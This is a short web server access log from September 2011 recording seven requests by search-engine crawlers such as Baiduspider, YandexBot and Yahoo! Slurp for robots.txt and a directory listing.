1.202.218.4 - - [14/Sep/2011:14:16:35 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "JikeSpider Mozilla/5.0 (compatible; JikeSpider; +http://shoulu.jike.com/spider.html)"
95.108.240.251 - - [14/Sep/2011:15:14:16 +0000] "GET /?C=D;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
61.135.249.129 - - [14/Sep/2011:15:55:42 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
119.63.196.20 - - [14/Sep/2011:16:28:05 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.5.26 - - [14/Sep/2011:16:46:12 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.115.166 - - [14/Sep/2011:18:11:58 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [14/Sep/2011:18:11:58 +0000] "GET /?C=N;O=D HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
